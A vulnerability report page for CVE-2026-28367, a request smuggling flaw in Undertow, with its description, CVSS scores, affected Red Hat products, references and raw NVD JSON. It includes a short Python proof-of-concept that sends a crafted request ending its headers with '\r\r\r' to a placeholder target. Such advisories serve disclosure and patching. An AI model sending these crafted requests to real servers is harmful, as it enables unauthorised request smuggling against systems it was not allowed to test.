Security Vulnerability Report
CVE-2026-28367 CVSS 8.7 HIGH

CVE-2026-28367

Published: 2026-03-27 17:16:28
Last Modified: 2026-04-10 14:22:53

Description

A flaw was found in Undertow. A remote attacker can exploit this vulnerability by sending `\r\r\r` as a header block terminator. This can be used for request smuggling with certain proxy servers, such as older versions of Apache Traffic Server and Google Cloud Classic Application Load Balancer, potentially leading to unauthorized access or manipulation of web requests.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
Metric Source
Red Hat (secondary metric). The NVD primary metric in the raw record below scores the flaw 9.1 CRITICAL with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N.
Weakness
CWE-444 (Inconsistent Interpretation of HTTP Requests, i.e. HTTP Request/Response Smuggling)

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_apache_camel_-_hawtio:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_apache_camel_for_spring_boot:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:data_grid:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:fuse:7.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:undertow:-:*:*:*:*:*:*:* - VULNERABLE
Undertow (see the vendor security advisory for the specific affected versions)
Apache Traffic Server (older versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Target configuration
host = "target.example.com"
port = 80

# Construct a request whose header block ends with \r\r\r instead of \r\n\r\n.
# This probes the header-terminator parsing flaw in Undertow described above.
# Note: Python joins the adjacent string literals before applying "+", so the
# parenthesised expression still yields the lines in the order written.
payload = (
    "POST / HTTP/1.1\r\n"
    "Host: " + host + "\r\n"
    "Content-Length: 10\r\n"
    "\r\r\r"  # \r\r\r sent in place of the \r\n\r\n header terminator
    "GARBAGEDATA"
)

print("[*] Sending malicious payload to " + host)

# Open the connection; the context manager closes the socket on exit, and the
# timeout keeps recv() from blocking forever if the server never answers.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(10)
    s.connect((host, port))
    # sendall() retries until the whole payload is written; send() may write
    # only part of it.
    s.sendall(payload.encode())

    # Receive the response; tolerate non-UTF-8 bytes instead of crashing.
    response = s.recv(4096)
    print("[+] Response received:")
    print(response.decode(errors="replace"))

References

https://access.redhat.com/security/cve/CVE-2026-28367 (Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2443260 (Issue Tracking, Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-28367",
    "sourceIdentifier": "secalert@redhat.com",
    "published": "2026-03-27T17:16:27.750",
    "lastModified": "2026-04-10T14:22:53.400",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Undertow. A remote attacker can exploit this vulnerability by sending `\\r\\r\\r` as a header block terminator. This can be used for request smuggling with certain proxy servers, such as older versions of Apache Traffic Server and Google Cloud Classic Application Load Balancer, potentially leading to unauthorized access or manipulation of web requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "secalert@redhat.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.8
        },
        {
          "source": "nvd@nist.gov",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "secalert@redhat.com",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-444"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_apache_camel_-_hawtio:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "19B253BB-F6CE-400B-87EF-1DF1AFFC2445"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_apache_camel_for_spring_boot:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "06A6AC25-2E2D-4359-A806-CC0355513A20"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:data_grid:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "7095200A-4DAC-4433-99E8-86CA88E1E4D4"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:fuse:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "AAD91726-93D9-4230-BF69-6A79B58E09E0"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "72A54BDA-311C-413B-8E4D-388AD65A170A"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D8BC03A-4198-4488-946B-3F6B43962942"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A24CBFB-4900-47A5-88D2-A44C929603DC"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "20A6B40D-F991-4712-8E30-5FE008505CB7"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:undertow:-:*:*:*:*:*:*:*", "matchCriteriaId": "8190B427-8350-43AE-8F54-6A40B701C95E"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://access.redhat.com/security/cve/CVE-2026-28367", "source": "secalert@redhat.com", "tags": ["Vendor Advisory"]},
      {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443260", "source": "secalert@redhat.com", "tags": ["Issue Tracking", "Vendor Advisory"]}
    ]
  }
}